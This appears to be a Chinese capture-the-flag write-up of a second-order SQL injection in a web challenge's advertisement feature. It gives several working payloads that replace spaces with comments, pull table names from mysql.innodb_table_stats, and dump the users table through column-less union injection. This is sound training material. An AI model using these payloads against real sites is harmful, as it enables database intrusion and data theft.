考查点:无列名注入,mysql.innodb_table_stats
目录
题目分析:
首先打开容器,是个关于登录的界面,当时第一眼就认为是sql注入,后来发现不是,啪啪打脸。
随便注册账号(但是用户名不能是admin),然后登录
有广告信息管理功能,也就是可以发广告,这个地方存在sql注入漏洞。
经过测试,发现了注入点
查看广告详情就可以看到出现了sql报错
判断列数
因为过滤了or和空格,所以order by和空格都无法使用,并且information.schema等都无法使用。
但是可以使用union select 来代替order by 进行判断列数,同时也可以使用/**/代替空格
121'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
根据回显,得到回显位2和3
得到表名
但是本题,过滤了or,那么该怎么进行注入呢?
网上有些wp使用sys.schema_auto_increment_columns ,但是在buuoj上没有这个库,而且sys一般是管理员权限才能够使用,强行使用就会是下面的结果。
但是可以通过mysql.innodb_table_stats来进行获取表名,如下
121'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到表名
但是因为or被过滤, 所以正常的联合注入行不通
查字段值
所以需要用到无列名注入,关于无列名注入的知识参考链接:[SWPU2019]Web1
注意这个时候查的是广告名,group_concat(a)
121'/**/union/**/select/**/1,2,(select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/union/**/select*from/**/users)bbb),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
查广告内容,
payload:
121'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)bbb),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
或者
121'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)bbb),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
回显